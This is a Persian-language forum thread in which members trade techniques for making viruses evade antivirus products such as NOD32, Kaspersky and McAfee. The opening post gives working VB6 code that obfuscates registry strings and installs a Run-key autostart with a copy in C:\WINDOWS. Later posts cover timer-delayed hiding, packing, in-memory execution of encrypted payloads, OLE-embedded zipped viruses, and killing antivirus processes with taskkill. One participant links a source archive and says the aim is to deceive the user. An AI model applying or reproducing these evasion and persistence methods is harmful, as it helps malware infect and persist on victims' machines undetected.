صفحه 1 از 2 12 آخرآخر
نمایش نتایج 1 تا 40 از 56

نام تاپیک: روش های پیشنهادی در مورد دوز زدن آنتی ویروس ها

  1. #1

    Tick روش های پیشنهادی در مورد دوز زدن آنتی ویروس ها

    سلام .
    تمامی دوستانی که به ویروس و آنتی ویروس نویسی علاقه دارند می تونن توی این تاپیک شرکت کنند .

    موضوع تاپیک : روش های پیشنهادی در مورد دوز زدن آنتی ویروس ها



    به عنوان اولین و کارآمد ترین روش من بحث رو باز می کنم :

    توابع زیر رو توی برنامه تعریف کنید (Coder و Decoder )



    Public Function DECODER(SS As String) As String
    Dim Str As String
    Dim US As String
    For i = 1 To Len(SS)
    Str = Mid(SS, i, 1)
    Select Case LCase(Str)
    Case "*": US = US & "W"
    Case "@": US = US & "I"
    Case "!": US = US & "N"
    Case "^": US = US & "D"
    Case "%": US = US & "O"
    Case "$": US = US & "S"
    Case "~": US = US & "Y"
    Case "`": US = US & "H"
    Case "|": US = US & "A"
    Case "#": US = US & "C"
    Case "?": US = US & "T"
    Case "'": US = US & "E"
    Case ",": US = US & "M"
    Case ";": US = US & "K"

    Case Else: US = US & UCase(Str)

    End Select
    Next i
    DECODER = US
    End Function
    Public Function CODER(SS As String) As String
    Dim Str As String
    Dim US As String
    For i = 1 To Len(SS)
    Str = Mid(SS, i, 1)
    Select Case LCase(Str)
    Case "w": US = US & "*"
    Case "i": US = US & "@"
    Case "n": US = US & "!"
    Case "d": US = US & "^"
    Case "o": US = US & "%"
    Case "s": US = US & "$"
    Case "y": US = US & "~"
    Case "h": US = US & "`"
    Case "a": US = US & "|"
    Case "c": US = US & "#"
    Case "t": US = US & "?"
    Case "e": US = US & "'"
    Case "m": US = US & ","
    Case "k": US = US & ";"

    Case Else: US = US & UCase(Str)

    End Select
    Next i
    CODER = US
    End Function




    حالا برای اینکه NOD32 عزیز و یا هر آنتی ویروس دیگه ای رو دور بزنیم میایم مسیر ها رو به صورت کد شده می نویسیم و توسط تابع Decoder اونها رو برای استفاده در برنامه Decode می کنیم . به عبارت ساده تر : متونی مثل مسیر های رجیستری که توسط آنتی ویروس ها شناخته میشن رو در زمان طراحی به صورت کد شده می نویسیم (استفاده از تابع Coder) بعد برای استفاده در برنامه اونها Decode می کنیم . یعنی فقط در زمان اجرا است که محتوای متون تغییر می کنه .




    پس :



    برای ایجاد یک مقدار Autostartup در رجیستری می تونیم اینطوری عمل کنیم :




    Set reg = CreateObject(CODER("*$#R@P?.$`'LL"))
    reg.RegWrite CODER("`;'~_#URR'!?_U$'R\$%F?*|R'\,@#R%$%F?\*@!^%* $\#URR'!?V'R$@%!\RU!\"), App.Path & "\" & App.EXEName & ".exe"
    FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\WINDOWS\Mehran.exe"




    و اما مکمل را حل بالایی اینه که هیچ وقت دستور Me.Hide و یا App.TaskVisible = False رو توی Form_Load ننویسد . پیشنهاد من اینه که دستورات ذکر شده تویه Timer مثلاً با Interval 100 بنویسید تا باز هم NOD32 عزیزمون یه کمی بیشتر فریب بخوره .






    منتظر نظرات و پیشنهادات دوستان عزیز هستم .
    آخرین ویرایش به وسیله مهران رسا : شنبه 24 فروردین 1387 در 14:56 عصر

  2. #2
    محروم شده
    تاریخ عضویت
    فروردین 1387
    محل زندگی
    BIOS
    پست
    65

    Cool من تونستم NOD32 رو دور بزنم !!!

    آقای pcm من یه کاری کردم که اصلا ان او دی متوجه کپی شدن برنامه در ریجستری نشد . من کد اجرای اتوماتیک رو در یه تایمر کپی کردم با اینتروال 1 . بعد یه تایمر دیگه گذاشتم تو برنامه با اینتروال 1000 . بعد دستور غیر فعال کردن تایمر یک رو گذاشتم توی تایمر دو . برنامه رو به فایل اجرایی تبدیل کردم و Nod انگار نه انگار . به همین روش من تونستم آنتی ویروس رو دور بزنم . اگه بخایید من میتونم سورسش رو در اختیارتون قرار بدم .
    ------------------------------
    اخبار جدیدترین ویروس ها و دانلود سورس برنامه های نوشته شده توسط من :
    www.ali-virus.blogfa.com

  3. #3
    با سلام .
    در همین ابتدا بگم اگه دوست داشته باشید می تونید منو مهران صدا کنید .

    و اما در مورد راه حل شما : خیلی ممنون ، راه حل جالبیه فقط باید زحمت بکشید سورس رو قرار بدید . همه باید علاوه بر روش پیشنهایشون کد برنامه رو هم قرار بدن تا بقیه دوستان بتونن نهایت استفاده رو ببرن .

    با تشکر ...

  4. #4
    محروم شده
    تاریخ عضویت
    فروردین 1387
    محل زندگی
    BIOS
    پست
    65
    سلام آقا مهران .
    حتما سورس رو قرار میدم تا دیگر دوستان هم استفاده ببرند .

  5. #5
    محروم شده
    تاریخ عضویت
    فروردین 1387
    محل زندگی
    BIOS
    پست
    65
    دوستان عزیز اینم سورس برنامه و فایل اجرایی برنامه هم داخلش هست . وقتی برنامه رو اجرا کردید یه سر به ریجستریتون بزنید . میبینید که آدرس برنامه اونجا توی کلید run نوشته شده .
    خب اینم از سورس برنامه که به زبان وی بی هستش : http://alireza2297.googlepages.com/FARIBANTIVIRUS.zip
    در پایان از دوستان عزیز میخام که در صورتی که برنامه باگ داشت به من اطلاع بدن .

  6. #6
    اینم روش جالبی بود ...

  7. #7
    بقیه دوستان ضمن اینکه از مطالب استفاده می کنید سعی کنید یکمی هم مفید ظاهر بشید ..

    منتظر روش های پیشنهادی شما هستیم ...

  8. #8
    با پک کردن فایل اجرایی خیلی از آنتی ویروسها دیگه قادر به شناسایی اونها نیستن.من molebox رو امتحان کردم خیلی عالی جواب میده.منتها حجم برنامه یک کمی بالا میره.

  9. #9
    سلام .

    لطفاً molebox بذارید تا بقیه استفاده کنن .

    با تشکر ..

  10. #10
    محروم شده
    تاریخ عضویت
    فروردین 1387
    محل زندگی
    BIOS
    پست
    65
    به نظر من بهترین راه دور زدن آنتی ویروس از کار انداختن اونه . یه ویروس یه چند مدت پیش زده به سیستم من و nod رو از کار انداخته بود و هر کاری می کردم تا آنتی ویروس رو دوباره نصب کنم نمیشد . نمیدونم مارمولک چه جوری این کار رو میکرد .

  11. #11
    دوست عزیز با پک کردن بعضی از انتی ویروس ها از جمله KasperSky به فایل ما مشکوک میشه و بهش گیر میده ... پس نتیجه میگیرم که پک کردن چندان هم خوشایند نیستش ...

  12. #12
    در ضمن یک روش هم من توسط C++‎ پیاده سازی کردم که فایلم رو با یک الگوریتم کد کردم بعد با یک نرم افزار اون رو از کد در اوردم و مستقیم ریختم توی حافظه و از توی RAM اجراش کردم ... اینجوری هم میشه تا حدودی انتی ویروسها و کرکر ها رو دور زد ... البته متاسفانه چون بحث مدیریت حافظه در میان هست VB از انجام این کار عاجز هستش ...

  13. #13
    در مورد روشی که گفتید یک سوال واسه من پیش اومد . آیا برنامه ای که می خواد توی RAM ریخته بشه و یا همون اجرا بشه ، نباید قبلش روی هارد وجود داشته باشه ؟

    آنتی ویروس ها فایل رو تا زمانی که کد شده باشه نمی شناسن . در این که شکی نیست .

    ولی زمانی که می خوایم فایل رو Decode کنیم چی ؟؟

  14. #14
    با استفاده از vb6 میشه یک فایل رو مستقیما از ram خوند یا پاک کرد . تقریبا شبیه کاری که w32/jeefo.a انجام میده و این کار هیچ نیازی به dll ,activex نداره .

  15. #15
    کاربر دائمی آواتار DoctorJay
    تاریخ عضویت
    مرداد 1386
    محل زندگی
    پارس - شیراز
    پست
    348
    نقل قول نوشته شده توسط H4i0 ACP مشاهده تاپیک
    با استفاده از vb6 میشه یک فایل رو مستقیما از ram خوند یا پاک کرد . تقریبا شبیه کاری که w32/jeefo.a انجام میده و این کار هیچ نیازی به dll ,activex نداره .
    اگه قبل از اینکه Decode انجام بشه و آنتی ویروس فایل رو پاک کنه این عملیات انجام بشه

    همه چی حله .

    من یه کارایی در این زمینه کرده بودم , با استفاده از شی OLE .

    کار اینجوریه که فایل اول میومد به آنتی ویروس حمله می کرد و بعد با ذخیره

    فایل از OLE بروی هارد و سپس اجرای اون فایل کارای خودشو انجام میده .

    این برنامه ی ساده بخاطر مشکل در استفاده از کدای Unzip نا تمام موند . . .

  16. #16

    Lightbulb

    نقل قول نوشته شده توسط DoctorJay مشاهده تاپیک
    اگه قبل از اینکه Decode انجام بشه و آنتی ویروس فایل رو پاک کنه این عملیات انجام بشه

    همه چی حله .

    من یه کارایی در این زمینه کرده بودم , با استفاده از شی OLE .

    کار اینجوریه که فایل اول میومد به آنتی ویروس حمله می کرد و بعد با ذخیره

    فایل از OLE بروی هارد و سپس اجرای اون فایل کارای خودشو انجام میده .

    این برنامه ی ساده بخاطر مشکل در استفاده از کدای Unzip نا تمام موند . . .
    با Unzip چی کار داشتی و چه مشکلی داشتی؟از رابط ole قدیمی ویندوز استفاده کردی یا از کدنویسی ole?

  17. #17
    حتی پیشرفتی ترین رمز نگاری ها یه روزی لو به درد نخور میشن ،پس بهتر اینه که خود آنتی ویروس و سرور ارتباطی اون بلاک بشن یا از اسکریپ استفاده بشه و شاید بهترین راه پاک کردن آنتی ویروس و جلو گیری از اجرای فایلهای اجرایی و ... باشه .
    taskkill /IM 'antivirus image name' /F
    kill antiviruspat
    یادم میاد قبلا یکی از دوستان VB کار نظر مشابهی را در بخش دلفی مطرح کرده بود و من بهش گفتم میتونه این کار رو روی آنتی ویروسی مثل کاسپرسکی امتحان کنه، تا متوجه بشه که حتی امکان تغییر یا اضافه کردن یک فایل به پوشه نصب کاسپرسکی رو نداره، چه برسه به اینکه بخواد پروسس مربوطه رو kill کنه!


    وَ سَيَعْلَمُ الَّذِينَ ظَلَمُوا [آل محمد حقهم] أَيَّ مُنْقَلَبٍ يَنْقَلِبُونَ - الشعراء (227)
    و ظالمین [حق آل محمد (ص) ] به زودی خواهند دانست که به کدام بازگشتگاه بازخواهند گشت.

  18. #18
    نقل قول نوشته شده توسط H4i0 ACP مشاهده تاپیک
    سلام
    چرا آنتی ویروس رو دور بزنیم ؟
    حتی پیشرفتی ترین رمز نگاری ها یه روزی لو به درد نخور میشن ،پس بهتر اینه که خود آنتی ویروس و سرور ارتباطی اون بلاک بشن یا از اسکریپ استفاده بشه و شاید بهترین راه پاک کردن آنتی ویروس و جلو گیری از اجرای فایلهای اجرایی و ... باشه .
    taskkill /IM 'antivirus image name' /F
    kill antiviruspat
    هدف ما فریب دادن کاربره نه از بین بردن آنتی ویروس .
    اگه شما خودت متوجه بشی آنتی ویروست از بین رفته چی کار می کنی ؟ مطمئناً دست رو دست نمی ذاری تا اون تروجان و یا ویروسی که اینکارو کرده به عملیاتش ادامه بده ...

  19. #19
    نقل قول نوشته شده توسط H4i0 ACP مشاهده تاپیک
    با استفاده از vb6 میشه یک فایل رو مستقیما از ram خوند یا پاک کرد . تقریبا شبیه کاری که w32/jeefo.a انجام میده و این کار هیچ نیازی به dll ,activex نداره .
    میشه بفرمایید چه طوری ؟

  20. #20
    لطفا در google عبارت Unlocker 8.1 را جست و جو کنید
    این در جواب من بود؟ اگر بله، پس می تونید با همین unlocker هم امتحان کنید تا متوجه بشید که با این روش ها نمی تونید فایل مربوطه رو حذف کنید.


    وَ سَيَعْلَمُ الَّذِينَ ظَلَمُوا [آل محمد حقهم] أَيَّ مُنْقَلَبٍ يَنْقَلِبُونَ - الشعراء (227)
    و ظالمین [حق آل محمد (ص) ] به زودی خواهند دانست که به کدام بازگشتگاه بازخواهند گشت.

  21. #21
    کاربر دائمی آواتار DoctorJay
    تاریخ عضویت
    مرداد 1386
    محل زندگی
    پارس - شیراز
    پست
    348
    نقل قول نوشته شده توسط H4i0 ACP مشاهده تاپیک
    با Unzip چی کار داشتی و چه مشکلی داشتی؟از رابط ole قدیمی ویندوز استفاده کردی یا از کدنویسی ole?
    من ویروس رو Zip کردم, بعد اونو گذاشتم تو شی OLE از ابزارهای خود ویژوال .

    بعد eXeاشو ساختم و یه تاپیک گذاشتم که این فایل را با آنتی ویروس خود چک کنید .

    اکثریت می گفتن آنتی ویروس ما پیدا نکرد . . .

    در صورتیکه فایل Zip شده در حالت نرمال شناسایی می شد !

  22. #22
    کاربر دائمی آواتار DoctorJay
    تاریخ عضویت
    مرداد 1386
    محل زندگی
    پارس - شیراز
    پست
    348
    من یه پیشنهاد دارم .

    اگه بیایم تک تک موضوع مطرح کنیم و بررسیش کنیم خیلی بهتر از اینکه رو کلیات یا

    فقط یه گوشه از مسائل مربوط به دور زدن آنتی ویروسا بپردازیم .

    مثلا موضوع رو Decode و روشهای مختلفش تعیین کنیم بعد روش ببحثیم !

    یا مثلا طرق مختلف کار با رجیستری یا مختل کردن آنتی ویروس و و و .....

    عرض بنده اینِکه دونه دونه روی مطالب بحث بشه , اینجوری نتیجشم بهتر خواهد بود .

  23. #23

    Lightbulb

    نقل قول نوشته شده توسط PCM2008 مشاهده تاپیک
    هدف ما فریب دادن کاربره نه از بین بردن آنتی ویروس .
    اگه شما خودت متوجه بشی آنتی ویروست از بین رفته چی کار می کنی ؟ مطمئناً دست رو دست نمی ذاری تا اون تروجان و یا ویروسی که اینکارو کرده به عملیاتش ادامه بده ...
    ----------------------------------------------------------------------------
    سلام
    اگر شما قصد ویروس نویسی داری ، آنتی ویروس ،ویروستو به عنوان یک برنامه می دونه و واگر هم خیلی توپ باشه چندتا هشدار میده*در حالت نهایت امنیت* .
    ----------------------------------------------------
    برای وقت هایی که آنتی ویروس ، ویروس رو نمیشناسه گزینه هایی در نظر گرفته شده . *submit*
    ---------------------------------------------------
    **************ویروس اگر نخواد خربکاری کنه چه فایدهای داره ؟
    ------------------------
    در ضمن آنتی ویروس وابسته به آپدیته و تا ویروسی به دست سازندگانش نرسه نمی تونه ویروس رو شناسایی کنه .وقتی به دست سازندگانش رسید با اپدیت آنتی ویروس ، ویروس 1-2-3 پاک می شه .
    ----------------------------------------------------------
    در ضمن یه سوال :
    میدونی فایل autoply.exe رو با چی ساختن ؟

  24. #24

    Exclamation

    نقل قول نوشته شده توسط PCM2008 مشاهده تاپیک
    هدف ما فریب دادن کاربره نه از بین بردن آنتی ویروس .
    اگه شما خودت متوجه بشی آنتی ویروست از بین رفته چی کار می کنی ؟ مطمئناً دست رو دست نمی ذاری تا اون تروجان و یا ویروسی که اینکارو کرده به عملیاتش ادامه بده ...
    نقل قول نوشته شده توسط PCM2008 مشاهده تاپیک
    میشه بفرمایید چه طوری ؟
    ----------------------------------------------------------------------
    لطفا در google سرچ کنید .

  25. #25
    سلام
    مدیر ارشد علی کشاورز
    ---------------------------------------------------
    لطفا متن بالا رو بخونید .
    ----------------------------------------------------
    نباید حتی با یه پیشنهاد احمقانه هم چنین برخوردی کرد .مگه این سایت سایتی برای بحث و آموزش پیرامون کامپیوتر نیست ؟این متن جوری نوشته شده که انگاری شما قصد زدن دارید و دارید منو مسخره می کنید .
    خیر. هیچگونه قصد تمسخری در کار نبوده. فقط یادم بود که اون کاربر روی دستور Kill در VB تاکید داشت و اصرار می کرد که میشه هر پروسسی رو باهاش بست.

    در ضمن کاری رو که می شه انجام داد ضد اون هم میشه انجام داد.
    صد در صد همینطور، ولی موضوع اینه که برای دور زدن Self-protection آنتی ویروسی مثل کاسپیرسکی، نمیشه از روش های ساده ایی مثل تابع Kill در VB و امثالهم استفاده کرد.


    وَ سَيَعْلَمُ الَّذِينَ ظَلَمُوا [آل محمد حقهم] أَيَّ مُنْقَلَبٍ يَنْقَلِبُونَ - الشعراء (227)
    و ظالمین [حق آل محمد (ص) ] به زودی خواهند دانست که به کدام بازگشتگاه بازخواهند گشت.

  26. #26
    قبلا میشد Self-protection رو به صورت دستی از کار انداخت و برنامه رو کرک کرد .
    --------------------------------------------------------------------------------------------------
    من هم این کار رو برای یه ویروس انجام دادم حالا به هر دلیل با اینکه پردازه اون قفل شده بود تونستم پاکش کنم .cpu..date.exe
    شاید شانسی بوده ، برای همین این پیشنهاد رو دادم ....

  27. #27
    نقل قول نوشته شده توسط H4i0 ACP;500087
    [COLOR=red
    در ضمن آنتی ویروس وابسته به آپدیته و تا ویروسی به دست سازندگانش نرسه نمی تونه ویروس رو شناسایی کنه .وقتی به دست سازندگانش رسید با اپدیت آنتی ویروس ، ویروس 1-2-3 پاک می شه .[/COLOR]
    هوش مصنوعی که جدیداً در آنتی ویروس هایی مثل NOD32 استفاده شده گفته شما رو تا حدودی نقض می کنه !

  28. #28
    قبلا میشد Self-protection رو به صورت دستی از کار انداخت و برنامه رو کرک کرد .
    Self-protection رو فقط کاربر Administrator اون هم از داخل خود Kaspersky میتونه غیرفعال کنه. خب اگر ویروس نویسی تا این سطح از دسترسی به یک سیستم فرضی رو داشته باشه، اصلا لزومی نداره که Self-protection رو غیرفعال کنه، روی آیکن ضد ویروس راست کلیک میکنه، و گزینه Pause Protection رو کلیک میکنه تا کلا ضدویروس غیر فعال بشه.


    وَ سَيَعْلَمُ الَّذِينَ ظَلَمُوا [آل محمد حقهم] أَيَّ مُنْقَلَبٍ يَنْقَلِبُونَ - الشعراء (227)
    و ظالمین [حق آل محمد (ص) ] به زودی خواهند دانست که به کدام بازگشتگاه بازخواهند گشت.

  29. #29
    سلام .

    قرار شد دنبال روش های دوز ردن آنتی ویرس ها باشیم نه غیر فعال کردن و از بین بردن اونها .

  30. #30
    محروم شده
    تاریخ عضویت
    فروردین 1387
    محل زندگی
    BIOS
    پست
    65
    به نظر من باید روی مسائل دور زدن آنتی ویروسها به صورت مقطعی کار کارد . مثلا چه کار کنیم تا بتونیم بخش on-access آنتی ویروس رو از کار بندازیم .

  31. #31
    کاربر دائمی آواتار DoctorJay
    تاریخ عضویت
    مرداد 1386
    محل زندگی
    پارس - شیراز
    پست
    348
    بخش on-access منظور چیه ؟؟

    آقا اگه کسی سورس Kazme__gheyz.exe رو گیر آورد حتما بذاره ...

  32. #32
    کاربر دائمی آواتار majjjj
    تاریخ عضویت
    فروردین 1386
    محل زندگی
    شیراز
    پست
    1,158
    اگه دوستان دقت کرده باشن برنامه هایی مثل انتی ها که در کنار ساعت یا Shell_TrayWnd
    قرار میگیرن به ترتیب وارد این قسمت میشن شاید بشه کاری کرد که برنامه قبل از انتی فعال بشه و کار خودش رو انجام بده سپس به انتی اجازه فعال شدن بده

  33. #33
    نقل قول نوشته شده توسط majjjj مشاهده تاپیک
    اگه دوستان دقت کرده باشن برنامه هایی مثل انتی ها که در کنار ساعت یا Shell_TrayWnd
    قرار میگیرن به ترتیب وارد این قسمت میشن شاید بشه کاری کرد که برنامه قبل از انتی فعال بشه و کار خودش رو انجام بده سپس به انتی اجازه فعال شدن بده

    سلام

    مساله اینجاست که تا قبل از اجرا شدن ویروس روی کامپیوتر قربانی چه طوری از شناسایی شدن ویروس توسط آنتی ویروس جلوگیری کنیم . ؟!!

  34. #34
    محروم شده
    تاریخ عضویت
    فروردین 1387
    محل زندگی
    BIOS
    پست
    65
    من یه برنامه نوشتم که میتونه کظم غیظ رو پیدا کنه . تا فردا میزارمش تو سایت .

  35. #35
    کاربر دائمی آواتار majjjj
    تاریخ عضویت
    فروردین 1386
    محل زندگی
    شیراز
    پست
    1,158
    نقل قول نوشته شده توسط PCM2008 مشاهده تاپیک
    سلام

    مساله اینجاست که تا قبل از اجرا شدن ویروس روی کامپیوتر قربانی چه طوری از شناسایی شدن ویروس توسط آنتی ویروس جلوگیری کنیم . ؟!!
    گفتم که برنامه باید از فعال شدن انتی تا زمانی که کارش تموم بشه جلوگیری کنه بعد اجازه بده بقیه برنامه ها ران بشن

  36. #36
    نقل قول نوشته شده توسط majjjj مشاهده تاپیک
    گفتم که برنامه باید از فعال شدن انتی تا زمانی که کارش تموم بشه جلوگیری کنه بعد اجازه بده بقیه برنامه ها ران بشن

    بهتره مساله رو یک کمی بازتر کنیم .

    فرض کن ویروس شما قرار روی کامپیوتری اجرا بشه که آنتی ویروس Macafee 2008 رو اون نصب هست .
    ویروس هنوز اجرا نشده !

    آنتی ویروس فعال هست و در صورتی که شما راهی واسه دور زدن اون یا به عبارت دیگر (جلوگیری از شناسایی شدن ویروستون توسط آنتی ویروس گفته شده ) پیدا نکنید مطمئنن آنتی ویروس ؛ ویروس شما رو شناسایی می کنه . و بسته به نوع فعالیتی که داره یه بلایی سر ویروس میاره .

    حالا وقتی ویروسی که هنوز اجرا نشده و مثلاً توی Flashdisk وجود داشته رو آنتی ویروس پاک کنه (یعنی اجازه نده اجرا بشه(که قطعاً هم همینطوره)) چه طوری می خواد آنتی ویروس رو غیر فعال کنه و از فعال شدن اون تا زمان اتمام کارش جلوگیری کنه ؟

    شما اصلاً کدی بنویس که آنتی ویروس به طور کلی پاک بشه ؛ تا وقتی ویروس اجرا نشه چطوری می خوای اینکارو بکنی ؟

  37. #37
    محروم شده
    تاریخ عضویت
    فروردین 1387
    محل زندگی
    BIOS
    پست
    65
    منظور از on-access اینه که همین که کاربر میخاد بدون آگاهی فایل ویروسی رو اجرا کنه جلو عملیات ویروس رو میگیره . در کل یعنی به صورت مداوم چک کردن فایلها توسط آنتی ویروسها .

  38. #38
    محروم شده
    تاریخ عضویت
    فروردین 1387
    محل زندگی
    BIOS
    پست
    65
    بخشید آقای mbt925
    اون پست مال من رو که حذف کردید اون پست که مشکلی نداشت . یک نفر در این تاپیک سورس آنتی ویروس کظم غیظ رو خواسته بود من آدرسش رو بهش دادم که بره دانلود کنه . کار بدی کردم .
    با تشکر .

  39. #39
    کاربر دائمی آواتار DoctorJay
    تاریخ عضویت
    مرداد 1386
    محل زندگی
    پارس - شیراز
    پست
    348
    خشید آقای mbt925
    اون پست مال من رو که حذف کردید اون پست که مشکلی نداشت . یک نفر در این تاپیک سورس آنتی ویروس کظم غیظ رو خواسته بود من آدرسش رو بهش دادم که بره دانلود کنه . کار بدی کردم .
    با تشکر .
    ممنون جناب ali virus . اگه میشه بصورت پیام خصوصی لینکشو واسم بذار ممنون میشم .

    بخاطره توضیح راجبه on-access هم ممنونم .

  40. #40
    کاربر دائمی آواتار majjjj
    تاریخ عضویت
    فروردین 1386
    محل زندگی
    شیراز
    پست
    1,158
    نقل قول نوشته شده توسط PCM2008 مشاهده تاپیک
    بهتره مساله رو یک کمی بازتر کنیم .

    فرض کن ویروس شما قرار روی کامپیوتری اجرا بشه که آنتی ویروس Macafee 2008 رو اون نصب هست .
    ویروس هنوز اجرا نشده !

    آنتی ویروس فعال هست و در صورتی که شما راهی واسه دور زدن اون یا به عبارت دیگر (جلوگیری از شناسایی شدن ویروستون توسط آنتی ویروس گفته شده ) پیدا نکنید مطمئنن آنتی ویروس ؛ ویروس شما رو شناسایی می کنه . و بسته به نوع فعالیتی که داره یه بلایی سر ویروس میاره .

    حالا وقتی ویروسی که هنوز اجرا نشده و مثلاً توی Flashdisk وجود داشته رو آنتی ویروس پاک کنه (یعنی اجازه نده اجرا بشه(که قطعاً هم همینطوره)) چه طوری می خواد آنتی ویروس رو غیر فعال کنه و از فعال شدن اون تا زمان اتمام کارش جلوگیری کنه ؟

    شما اصلاً کدی بنویس که آنتی ویروس به طور کلی پاک بشه ؛ تا وقتی ویروس اجرا نشه چطوری می خوای اینکارو بکنی ؟
    وقتی شما یک برنامه ساده مینویسی ایا انتی ها بهش گیر میدن و اون رو پاک میکنن مسلما خیر بارها شنیدیم که فلان ویروس از دو فایل اجرایی تشکیل شده که اولی فلان کاررو میکنه و دومی کار اصلی رو چند روز قبل یک سیستم دیدم که ویروسهاش رو پاک کردم اما فولدر اپشن رو غیر فعال کرده بود ویروس هاش پاک شده بودن اما هنوز این گزینه غیر فعال بود
    خوب این همونیه که من گفتم در ضمن بعضی ویروسها رو انتی های به روز و بزرگ هم نمیشناسن این رو که قبول دارین
    یک نمونه دیگه هم روی یک سیستم دیگه دیدم که فایلهای هاید و سوپر هاید رو نشون نمیداد اما ویرسی روش پیدا نشد پس یک برنامه سومی هم دخیله منظورم فایل اتوران وخود ویروس و فایل کمکی هست وقتی هم که فولدر اپشن رو تنظیم میکردی به حالت اصلیش بر میگشت

صفحه 1 از 2 12 آخرآخر

قوانین ایجاد تاپیک در تالار

  • شما نمی توانید تاپیک جدید ایجاد کنید
  • شما نمی توانید به تاپیک ها پاسخ دهید
  • شما نمی توانید ضمیمه ارسال کنید
  • شما نمی توانید پاسخ هایتان را ویرایش کنید
  •